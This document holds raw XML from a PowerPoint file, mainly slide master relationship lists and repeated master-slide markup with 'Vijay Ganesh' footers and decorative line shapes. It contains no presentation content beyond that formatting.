<file path=ppt/slideMasters/_rels/slideMaster2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86.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout276.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout277.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout278.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout279.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout280.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout281.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout282.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout283.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout284.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout285.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster2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97.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout287.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout288.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout289.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout290.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout291.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout292.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout293.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout294.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout295.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout296.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster2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08.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout309.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml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298.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout299.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout300.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout301.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout302.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout304.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout305.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout306.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout307.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster2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20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout310.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout311.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout312.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout313.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout314.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout315.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout316.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout317.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout318.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout319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3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1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout321.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout322.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout323.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout324.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout325.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout326.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout327.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout328.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout329.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout330.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster3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2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout332.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout333.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout334.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout335.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout336.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout337.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout338.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout340.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout341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5.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout96.xml"/><Relationship Id="rId9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5029200"/>
            <a:ext cx="104648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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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889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333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78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222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67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124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81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38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95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50419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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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9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3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8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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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9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3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8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72400" y="2768600"/>
            <a:ext cx="39624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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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9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3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8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50419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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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649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093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538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9956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fontAlgn="base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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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16387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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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FC6A588B-6C05-4C44-B6BD-BE778AF2BA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389" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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17411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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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186E1353-555D-2D46-8E7A-4778FD7014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413" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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</p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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18435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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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485B82FC-B16B-FD44-AC94-4ABB5A8530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8437" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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19459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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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8D4EA443-0542-FB40-B904-D419D19D22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9461" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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2051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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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AC8D5341-206B-2E46-AC27-134AD1D915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3" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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 xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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20483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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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24995D4F-2B68-E24E-AAAF-71DB4FA3B8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485" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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21507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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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BBE728F9-E189-1F42-9298-8830A4BA8D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509" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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22531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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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376202B5-89AF-7C47-9983-5A4B5DB9D1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2533" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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23555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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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FD9F7E26-CA55-A645-B915-DB5ECCB350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557" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32639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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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24579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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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9AA79751-4763-9346-8C06-1A4618FA00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4581" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32639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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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</p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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25603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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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1499CFF7-ECD2-5849-AFA1-BF7A7AE761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5605" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32639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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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</p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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26627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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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644B9C1E-BE2C-4044-8358-01130C9B1F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6629" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32639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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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</p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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27651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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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82412496-619A-3D4C-8248-2D164288AF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7653" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32639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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="13004800" cy="9753600"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2053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2060" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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38" name="Line 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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46" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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51" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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56" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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061" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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66" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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78" name="Line 46"/>
                <p:cNvSpPr>
